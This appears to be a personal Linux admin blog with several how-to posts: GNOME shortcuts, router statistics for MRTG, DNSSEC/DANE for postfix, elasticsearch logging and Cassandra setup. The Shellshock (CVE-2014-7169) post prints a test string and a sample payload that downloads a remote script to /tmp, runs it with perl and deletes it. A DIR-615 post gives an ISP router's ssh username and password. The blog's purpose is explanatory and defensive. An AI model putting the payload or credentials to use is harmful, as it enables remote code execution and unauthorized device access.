Showing posts with label bash. Show all posts

Saturday, December 6, 2014

Gnome goodies: common keyboard shortcuts. Remembering the state of num lock.

If you have been using linux, the key on your keyboard with the windows logo is known as the Super key. This Super key is widely used in gnome 3. Today, we will learn some of the commonly used keyboard shortcuts. You can also find other keyboard shortcuts in gnome-control-center under Keyboard Shortcuts.

Keyboard Shortcut           Description
Super+Up                    Maximize window
Super+Down                  Unmaximize window
Super+Left Arrow            Fill the left half of the screen
Super+Right Arrow           Fill the right half of the screen
Super+click, then move      Move the window anywhere on screen
Super+m                     Bring up the message tray at the bottom of the screen
Alt+Tab                     Switch between applications
Alt+`                       Switch between windows of the current application
Super                       Bring up the activities overview
Drag application to dash    Add an application you use often to the dash so it can be easily accessed
Drop application on grid    Remove an application from the dash by dragging it from the dash and dropping it on the grid
Ctrl+Alt+Up Arrow           Switch to the workspace above
Type in a file window       Quickly search for a file in the file window
Alt+PrintScn                Take a screenshot of the current window only
Shift+PrintScn              Take a screenshot of a selected area of the screen

I am not sure why, each time the operating system reboots, the state of num lock on the keyboard gets forgotten. This is quite puzzling considering gnome has been evolving for so many release cycles. But that's okay; we will configure gnome so that it remembers the state of num lock between system boots. Launch dconf-editor and expand the tree along the path org -> gnome -> settings-daemon -> peripherals -> keyboard. Check remember-numlock-state, and see the screenshot below.
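If you prefer the command line, the same key can be flipped with the dconf CLI. This is a sketch assuming the dconf command-line tool is installed; the key path mirrors the tree shown above.

```shell
# enable remembering of the num-lock state (same key as in dconf-editor)
dconf write /org/gnome/settings-daemon/peripherals/keyboard/remember-numlock-state true

# read it back to confirm
dconf read /org/gnome/settings-daemon/peripherals/keyboard/remember-numlock-state
```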


With this article, I hope you can navigate better in the gnome-shell environment.

Friday, December 5, 2014

Poll statistics from Asus router RT-N14UH through http and plot in mrtg

If you have the Asus router model RT-N14UHP, you should probably read on. This is a pretty decent router capable of a lot of features, including qos and ipv6 support. It's pretty odd that this router somehow does not come preinstalled with the net-snmp package. For your information, snmp allows a device to be polled for statistics collection purposes.


I had asked asus support for the ability to poll statistics from the router using snmp some time around September 2014. The response I got was that development had taken on the request, but with no guarantee of when it would be made available. I took a deeper look into whether the router supports net-snmp, and googled around to check if someone had hit a similar problem and solved it before; unfortunately, there was nothing as of this writing. A few come close, this and this. The idea is to mount an USB disk on the router, after which the router can install ipkg (a package manager for the router). Using ipkg, you can install the net-snmp package; however, the package will be installed on the mounted USB drive rather than on the router itself. That's a pity: if the usb disk is unmounted, then things will not work. Example commands below:
user@RT-N14UHP:/asusware# ipkg install net-snmp
Installing net-snmp ( to /opt/...
Configuring net-snmp
Successfully terminated.

user@RT-N14UHP:/asusware# net-snmp yes
Restarting the package...

Today, we will try something different. We will poll statistics from the router through http and then plot the graph using the well known software mrtg. By default, MRTG polls devices for statistics using snmp. However, it also allows data collection using a script, which is something very nifty! Let's start by installing these packages on the client.
$ sudo apt-get install mrtg apache2

The apache2 package is for you to access the graphs via a browser. There should be a cron job running every five minutes, /etc/cron.d/mrtg, so statistics will always be polled and the graphs will always be generated and updated. Configuration of apache2, and where mrtg is accessible from the web, is left as an exercise for you. (Hint: apache's document root is by default /var/www.)

Create a script that will poll statistics from the router. Below is the script; you can download this bash script and place it in /bin/.
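As a rough sketch of what such a poller looks like: MRTG's external-script protocol expects four lines on stdout (incoming byte counter, outgoing byte counter, uptime, target name). The URL and the response format below are hypothetical placeholders, not the router's real endpoint; adapt the fetch step to what your firmware actually serves.

```shell
#!/bin/bash
# Sketch of an MRTG external script. The router URL and response format
# are hypothetical placeholders -- substitute what your firmware serves.
ROUTER_IP=""   # your router IP
AUTH=""        # the Basic auth string captured from the login headers

# parse_counters: extract "rx tx" byte counters from a response of the
# hypothetical form "rx=<bytes> tx=<bytes>"
parse_counters() {
    echo "$1" | sed -n 's/.*rx=\([0-9]*\).*tx=\([0-9]*\).*/\1 \2/p'
}

# fetch the page holding the interface counters (endpoint is a placeholder)
response=$(curl -s -H "Authorization: Basic $AUTH" "http://$ROUTER_IP/...")

read -r rx tx <<< "$(parse_counters "$response")"

# MRTG external-script output: in-counter, out-counter, uptime, target name
echo "$rx"
echo "$tx"
echo "unknown"
echo "RT-N14UHP"
```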

There are a few configuration values you need to change. The obvious one is the router IP; change it to your router's IP. hwaddr is the hardware address of eth0 on your router. To get hwaddr from your router, enable telnet from the router's web graphical user interface and then log in from the command line. Then issue a command such as the one below.
user@RT-N14UHP:/tmp/home/root# ip addr show eth0
2: eth0: <BROADCAST,MULTICAST,UP,10000> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 40:40:40:40:40:40 brd ff:ff:ff:ff:ff:ff
    inet6 fe80::1234:1234:1234:1234/64 scope link 
       valid_lft forever preferred_lft forever

The value of the link/ether field will be the value for hwaddr in the url. To get the value of http_id, issue a command such as the one below in the router terminal.
admin@RT-N14UHP:/www# nvram get http_id

Then install the firefox Live HTTP Headers plugin and start it. When the browser is pointed to the router url and you have successfully logged in, a line such as the one below should appear. Use the string after Basic and fill it into the url.
Authorization: Basic YGG3333d3BjMTQ5PPP=

With all these changes made, the script is good to go. Next, we will write the mrtg configuration file.
### Global Config Options

#  for Debian
WorkDir: /var/www/router

### Global Defaults

#  to get bits instead of bytes and graphs growing to the right
# Options[_]: growright, bits
Options[_]: growright

EnableIPv6: no

Target[router-to-inet_1]: `/bin/`
MaxBytes[router-to-inet_1]: 700000
Title[router-to-inet_1]: Network traffic between router and internet
PageTop[router-to-inet_1]: <h1>Network traffic between router and internet</h1>

It's a pretty simple configuration file, and you can place it in /etc/mrtg.cfg. The entry that needs some explanation is probably the Target line: it points to the script that generates the statistics from the router. The script is placed in /bin, but you can place it anywhere as long as mrtg has permission to execute the file. Note that the script you amended previously is what mrtg actually runs here. For the parameters in the configuration file, you can find more explanation here.

Now, in the terminal, run mrtg against this configuration:
user@localhost:~# env LANG=C /usr/bin/mrtg /etc/mrtg.cfg
2014-10-22 20:26:54, Rateup WARNING: /usr/bin/rateup could not read the primary log file for router-to-inet_1
2014-10-22 20:26:54, Rateup WARNING: /usr/bin/rateup The backup log file for router-to-inet_1 was invalid as well
2014-10-22 20:26:54, Rateup WARNING: /usr/bin/rateup Can't rename router-to-inet_1.log to router-to-inet_1.old updating log file
user@localhost:~# env LANG=C /usr/bin/mrtg /etc/mrtg.cfg

I don't know why there are errors; it is probably initialization, as the next command execution should finish without any error. Now check the web server directory; by default on debian for this mrtg setup, it is:
user@localhost:/var/www/router$ ls
mrtg-l.png  mrtg-r.png        router-to-inet_1.html  router-to-inet_1-month.png  router-to-inet_1-week.png
mrtg-m.png  router-to-inet_1-day.png  router-to-inet_1.log   router-to-inet_1.old  router-to-inet_1-year.png

A few files should have been generated. That's good. When you installed the mrtg package, a cron file should have been installed by default at /etc/cron.d/mrtg. Take a look at the following:
*/5 * * * * root if [ -x /usr/bin/mrtg ] && [ -r /etc/mrtg.cfg ] && [ -d "$(grep '^[[:space:]]*[^#]*[[:space:]]*WorkDir' /etc/mrtg.cfg | awk '{ print $NF }')" ]; then mkdir -p /var/log/mrtg ; env LANG=C /usr/bin/mrtg /etc/mrtg.cfg 2>&1 | tee -a /var/log/mrtg/mrtg.log ; fi

So every five minutes, the statistics get collected. If you do not have this, just create such a cron file yourself. That's it; now point your browser to the web server url.


I hope you find it useful too.

UPDATE: You can also find the source file here.

Saturday, November 15, 2014

Implementing DNSSEC and DANE for email - Step by step

Note: this article was written and contributed by a good friend, gryphius, so all credit goes to him. I'm just copying and pasting his awesome work here. :-)

After various breaches at the certificate authorities it has become clear that we need a way to authenticate a server certificate without the need to trust a third party. “DNS-based Authentication of Named Entities“ (DANE) makes this possible by publishing the certificate in the DNS. Find more information about DANE here.

In this tutorial we show an example implementation of DANE for email delivery.

What you need

  • a DNSSEC capable nameserver (in this example: powerdns)
  • a DNSSEC capable registrar  (in this example:
  • a mail server with TLS Support (in this example: postfix )
  • to test the secured email delivery: a second mailserver with DANE support ( postfix >=2.11, DNSSEC capable resolver )
We start off with a postfix server already configured to accept mail for our domain, but with no TLS support so far. Let's add this now by generating a self-signed certificate:
In this state, a sending server can encrypt the transmission, but it cannot verify the self-signed server certificate, so it will treat the TLS connection as anonymous:
postfix/smtp[13330]: Anonymous TLS connection established to[...]:25: TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)
In order to enable DANE support, our domain's DNS zone must be secured with DNSSEC. Our example domain is hosted on a powerdns authoritative server; securing a zone on a current powerdns is pretty easy:
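For example, with the pdnssec tool shipped with powerdns 3.x, the sequence looks like this (the zone name is a placeholder):

```shell
# sign the zone and create its DNSSEC keys
pdnssec secure-zone example.invalid

# fix up ordering/auth fields so the signed zone serves correctly
pdnssec rectify-zone example.invalid

# print the zone's keys -- the DS/DNSKEY output is what goes to the registrar
pdnssec show-zone example.invalid
```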

The key from the last command must be copied to the registrar. At the registrar, the form to add a DNSSEC key looks like this:


Once the key is added and synchronized on the registry's DNS servers, you can test DNSSEC functionality with an online checker.

Now, back on the mailserver hosting our domain, we have to create a hash of the SSL certificate:
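For a "3 0 1" TLSA record (full certificate, SHA-256 over the DER encoding), the hash can be computed with openssl as sketched below. The throwaway certificate is generated only so the example is self-contained; in practice you hash the certificate postfix actually serves.

```shell
cd "$(mktemp -d)"

# for demonstration only: a throwaway self-signed cert to hash; in practice
# use the certificate configured in postfix's smtpd_tls_cert_file
openssl req -new -x509 -days 1 -nodes -subj "/" \
    -out server.pem -keyout server.key 2>/dev/null

# SHA-256 over the DER-encoded certificate -> the data field of a 3 0 1 record
openssl x509 -in server.pem -outform DER | sha256sum | awk '{print $1}'
```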

Using this value  we can add the DANE TLSA record for our mailserver in the DNS zone:

In powerdns, add a record (replace the name with your real mx hostname):

Type:    TLSA
Content: 3 0 1 02059728e52f9a58a235584e1ed70bd2b51a44024452ec2ba0166e8fb1d1d32b

The “3 0 1” means: “we took a full domain-issued certificate, and created a sha256 hash of it”. For other possible values, see RFC 6698 sections 7.2 – 7.4.

Now we can test the new DANE TLSA record with an online checker.

And finally, let's test it from another postfix box. For this to work, the sending server must use a DNSSEC resolver (for example, unbound) and postfix >=2.11 with DANE enabled:
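On the sending side, the relevant postfix (>= 2.11) parameters are the standard DANE settings; a minimal sketch, assuming the local resolver already validates DNSSEC:

```shell
# enable DNSSEC lookups and opportunistic DANE for outbound smtp
postconf -e "smtp_dns_support_level = dnssec"
postconf -e "smtp_tls_security_level = dane"
postfix reload
```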

And voilà, our connection is now verified even though we're using a self-signed certificate:

postfix/smtp[17787]: Verified TLS connection established to[...]:25: TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)


Saturday, October 25, 2014

Why CVE-2014-7169 is important and why you should patch your system

Recently I came across this link and read about it. Before we go into the details, let's understand what it is.

From Red Hat errata

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

So let's check my system. Hmm.. my local host is affected :-)
jason@localhost:~$ env x='() { :;}; echo vulnerable'  bash -c "echo this is a test"
this is a test
jason@localhost:~$ whoami

But why is this important? The user is still running with his own privileges. It turns out this exploit allows a remote attacker to execute a script remotely. Let's change the script a bit.
() { :;}; /bin/bash -c "cd /tmp;wget;curl -O ; perl /tmp/jur;rm -rf /tmp/jur"

See the point? Does it look scary? A remote script is downloaded to your system and executed. So any local service that uses the shell for interpretation is basically vulnerable, and you should patch bash as soon as possible. As of this moment of writing, the patch is out. In CentOS 7, the fix is included in the package bash-4.2.45-5.el7_0.4.x86_64. Read the changelog below.
* Thu Sep 25 2014 Ondrej Oprala <> - 4.2.45-5.4
- CVE-2014-7169
Resolves: #1146324
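To check whether a bash binary is vulnerable to CVE-2014-7169 itself (rather than the original CVE-2014-6271), a widely circulated test works like this: on a vulnerable bash it creates a file named echo containing the output of date, while a patched bash only reports an error.

```shell
# run in an empty scratch directory: a vulnerable bash writes the output of
# `date` into a file called "echo"; a patched one does not create the file
cd "$(mktemp -d)"
env X='() { (a)=>\' bash -c "echo date"
if [ -f echo ]; then
    echo "vulnerable: $(cat echo)"
else
    echo "not vulnerable"
fi
```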

Below are some services which use bash; if your system runs any of them, you should know what to do.

  • ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access.

  • Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in Bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string).

  • PHP scripts executed with mod_php are not affected even if they spawn subshells.

  • DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine.

  • Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run.

  • Any other application which is hooked onto a shell or runs a shell script using Bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells.

Thanks, that's it for this article. Be good and stay safe.

Sunday, January 26, 2014

Overwrite tmnet DNS in router DIR-615

In the past, I read about how sites were "blocked" in Malaysia, leaving web surfers unable to load some websites. I don't know what the fuss was about, but it certainly created a lot of talk on social websites. The term blocked would properly apply at the IP level: if access from a machine to an address a.b.c.d is unreachable, then that is really blocked. But the funny thing is, some ISPs in malaysia do not actually block the IPs; they merely make some hostnames unresolvable to an IP.

So in this article, I'm gonna show you how you can get back your freedom. There are many public DNS servers out there; just googling public DNS will give you a long list. In fact, google has a public DNS too. When you choose a DNS server, be sure it is publicly trustable; the speed from your machine to the DNS server also matters if you want the web browser to determine IP addresses quickly.

With that said, I'm gonna show you how to overwrite the DNS entries in the tmnet router DIR-615. You need to ssh to your router to accomplish this. I have tried many times in the web interface; though it has text boxes for you to fill in, apparently you cannot set the list that you want, it always defaults to the tmnet DNS. This is annoying!

What you need: a terminal, an ssh program installed, username = operator, password = h566UniFi

After you have ssh into the router, these are all the steps you need to do.
# cat /var/etc/resolv.conf
# This file is generated by gen_resolv.php

# sed 's/' -i /var/etc/resolv.conf
# sed 's/' -i /var/etc/resolv.conf
# cat resolv.conf
# This file is generated by gen_resolv.php

So I have an internal IP there because there is an internal DNS service running; the other entry is the google public DNS.
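In generic form, the substitution looks like the sketch below. The addresses are placeholders: the old value is whatever resolver your ISP pushed into resolv.conf, and the new one is your preferred resolver, e.g. for Google's public DNS.

```shell
# swap an ISP-pushed resolver for your own choice; OLD/NEW are placeholders
# (dots are left unescaped in the sed pattern for brevity)
OLD=""   # resolver currently listed in resolv.conf
NEW=""        # e.g. Google public DNS
RESOLV=/var/etc/resolv.conf

if [ -f "$RESOLV" ]; then
    sed -i "s/nameserver $OLD/nameserver $NEW/" "$RESOLV"
else
    echo "no $RESOLV here -- run this on the router"
fi
```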

Well, that's all you need. For a site which previously could not be resolved to an IP, you can check by pinging the hostname; it should now return a valid IP. That's all folks, I hope you learned something and gained back your rights.

Wednesday, December 25, 2013

Lightweight Java Game Library

Since childhood, gaming has been one of my favorite activities. If you are from the 80s, Super Mario should sound familiar to you. =) 30 years have passed, and game development has improved tremendously over that period.

In this article, we are going to explore game development. Most games are written in low level languages, for example C, and thus development is very complicated. This certainly introduces a steep learning curve if you are a beginner. Hence, we will choose a simple starting point to learn about game development. An example of a library that can be used is the Lightweight Java Game Library, or its acronym LWJGL.

What is Lightweight Java Game Library?

The Lightweight Java Game Library (LWJGL) is a solution aimed directly at professional and amateur Java programmers alike to enable commercial quality games to be written in Java. LWJGL provides developers access to high performance crossplatform libraries such as OpenGL (Open Graphics Library), OpenCL (Open Computing Language) and OpenAL (Open Audio Library) allowing for state of the art 3D games and 3D sound. Additionally LWJGL provides access to controllers such as Gamepads, Steering wheel and Joysticks. All in a simple and straight forward API.

Because the nature of this library is dealing with graphic display, the hardware display driver must be set up correctly. My workstation uses an ati radeon with xserver-xorg-video-radeon, and 3D acceleration is enabled with the package libgl1-mesa-dri. We won't delve deep into graphic driver installation and configuration since our focus here is game development. You can check if your driver is set up properly by running glxgears in a terminal. If a window pops up with three gears spinning, your driver installation and setup should be fine to continue with this coding tutorial.

The official wiki is well written and documented to get you started. With this, I have set up my eclipse environment in debian sid. The library needs to be added to the project build path so that when you run your application, the library is detected. Because I'm running linux, the native library location points to lwjgl-2.9.1/native/linux. These two library settings must be configured before any development begins. If you noticed, I've set up the source as well; it will be convenient for reading the code if you need to check something later down the road during the coding phase.

There are many tutorials to pick from; as a start, I just picked the basics - LWJGL Basics 1 (The Display). The source code is in the link, and it is incredibly easy to create the display with a few lines of code; I got the window to display on my first try. Very impressive and promising.

It is pretty impressive what this library can do. There are many examples that come in the library and one of it is an example game. Just execute
java -cp .:res:jar/lwjgl.jar:jar/lwjgl_test.jar:jar/lwjgl_util.jar:jar/jinput.jar: -Djava.library.path=native/linux org.lwjgl.examples.spaceinvaders.Game

if you are running linux. It ran fine in my environment and I played the bundled game; amazing. Maybe in my next article, I'm gonna try to even complete this.

Monday, December 23, 2013

Elasticsearch index slow log for search and indexing

Today, we are going to learn about logging in elasticsearch for its search and index operations. The elasticsearch config file, elasticsearch.yml, should have a configuration section such as below:
################################## Slow Log ##################################

# Shard level query and fetch threshold logging.

#index.search.slowlog.threshold.query.warn: 10s
#index.search.slowlog.threshold.query.info: 5s
#index.search.slowlog.threshold.query.debug: 2s
index.search.slowlog.threshold.query.trace: 500ms

#index.search.slowlog.threshold.fetch.warn: 1s
#index.search.slowlog.threshold.fetch.info: 800ms
#index.search.slowlog.threshold.fetch.debug: 500ms
index.search.slowlog.threshold.fetch.trace: 200ms

#index.indexing.slowlog.threshold.index.warn: 10s
#index.indexing.slowlog.threshold.index.info: 5s
#index.indexing.slowlog.threshold.index.debug: 2s
index.indexing.slowlog.threshold.index.trace: 500ms

So with this example, I have enabled tracing for search query and search fetch at 500ms and 200ms respectively. A search in elasticsearch consists of query time and fetch time, hence the two configurations for search. Meanwhile, logging for elasticsearch indexing is also enabled with a threshold of 500ms.

With these configurations set, if your indexing or search exceeds the threshold, an entry will be logged into a file. The log file is located under the path.log directory that is set in elasticsearch.yml.

So what do the numbers really mean? Excerpts from the elasticsearch official documentation:

The logging is done on the shard level scope, meaning the execution of a search request within a specific shard. It does not encompass the whole search request, which can be broadcast to several shards in order to execute. Some of the benefits of shard level logging are the association of the actual execution on the specific machine, compared with request level.


All settings are index level settings (and each index can have different values for them), and can be changed at runtime using the index update settings API.


... and I have tried updating the index setting via a simple tool I made earlier. The idea is the same: you just need to issue an http call putting the variable into the index settings. You can find more information here. The keys for the configuration are available in the corresponding source class.
[jason@node1 bin]$ ./ set search.slowlog.threshold.query.trace 500
{
  "ok" : true,
  "acknowledged" : true
}
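The same change can also be made with a plain curl call against the index update-settings API; the host and index name below are examples, and a running node is required:

```shell
# set the query slow-log trace threshold at runtime on index "index_test"
curl -XPUT 'http://localhost:9200/index_test/_settings' -d '{
    "index.search.slowlog.threshold.query.trace" : "500ms"
}' || echo "no elasticsearch node listening on localhost:9200"
```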

[2013-12-23 12:31:12,758][TRACE][] [node1] [index_test][146] took[1s], took_millis[1026], types[foo,bar], stats[], search_type[QUERY_THEN_FETCH], total_shards[90], source[{"size":80,"timeout":10000,"query":{"filtered":{"query":{"query_string":{"query":"maxis*","default_operator":"and"}},"filter":{"and":{"filters":[{"query":{"match":{"site":{"query":"","type":"boolean"}}}},{"range":{"unixtimestamp":{"from":null,"to":1387825199000,"include_lower":true,"include_upper":true}}}]}}}},"filter":{"query":{"match":{"site":{"query":"","type":"boolean"}}}},"sort":[{"unixtimestamp":{"order":"desc"}}]}], extra_source[],

With this example, the query has exceeded the threshold set at 500ms; it ran for 1 second.

As for indexing, the fundamental concept is the same, so we won't elaborate in this article; we leave that to you as an exercise. :-)

Saturday, December 21, 2013

vifm a true gem

filemanager goes vim

  * A ncurses file manager with a vim-like UI. As a vim user you will feel right
at home: a command like dd deletes a line just like in vim, and you can move to
the other window and type p to paste the line from the "clipboard" there. The
normal movement commands hjkl work as expected: j/k move down/up through the
items in the list, and h/l move up/down a directory. Like in vim, most settings
are made in its rc file; the vifmrc lives in ~/.vifm. The project documentation
gives an idea of all the options you have in vifm. It's amazing what you can do
with vifm; if you, like me, have been using vim for some time, this file manager
is a true gem. And much like vim, the options are "endless". Browse the project
homepage, where you will find the source code, setup instructions, and help to
make your own setup. I often look at configs and setups on github to get ideas
and maybe improve my own.

  * The documentation for vifm is available online.

  * I must say that after using vifm for some time, and after some github'ing, I
made my own vifmrc with some nice filetype settings and hard bookmarks. It's
like vim: the more you use it and add to your rc file, the better and faster it
gets.

  * So thanks to ksteen & xaizek for this power-tool.
It doesn't look like much, but it is ;)

Tuesday, October 15, 2013

cassandra 2.0 catch 101 - part1 - correct cassandra Unsupported major.minor version 51.0

This is another entry in the series on my journey to cassandra 2.0; if you have not read the previous post, you should read it here.

As cassandra 2.0 requires jdk 7.0 or later, if your system has jdk 6 running and configured, it is still possible to run cassandra 2.0 with jdk 7, that is, to make them co-exist. Download the jdk and extract it to a directory, e.g. /usr/lib/jvm, then add JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04/ to /etc/default/cassandra. This exports the variable JAVA_HOME to the environment so that jdk 7 is used to start cassandra successfully.
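As a quick sanity check before wiring the path into /etc/default/cassandra, you can confirm the extracted JDK actually reports version 1.7; the install path below is the example used in this article.

```shell
# verify the JDK 7 install before pointing cassandra at it
JAVA_HOME=/usr/lib/jvm/jdk1.7.0_04
if [ -x "$JAVA_HOME/bin/java" ]; then
    "$JAVA_HOME/bin/java" -version
else
    echo "JDK not found at $JAVA_HOME -- adjust the path"
fi
export JAVA_HOME
```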

Because the above setting works for the cassandra instance only, we will set up another environment for the admin tools that come with it. This makes sure we don't break our existing work. If you want the environment to work only for yourself, create a file in your home directory, $HOME/ . Below is its content.
. /usr/share/cassandra/

The first line is the same as previously, but on the second line we source the additional environment settings for the admin tools so that they can find the java classes. With that done, you should not get the error Unsupported major.minor version 51.0 shown below anymore!
Exception in thread "main" java.lang.UnsupportedClassVersionError: org/apache/cassandra/tools/NodeCmd : Unsupported major.minor version 51.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClassCond(
at java.lang.ClassLoader.defineClass(
at Method)
at java.lang.ClassLoader.loadClass(
at sun.misc.Launcher$AppClassLoader.loadClass(
at java.lang.ClassLoader.loadClass(
Could not find the main class: Program will exit.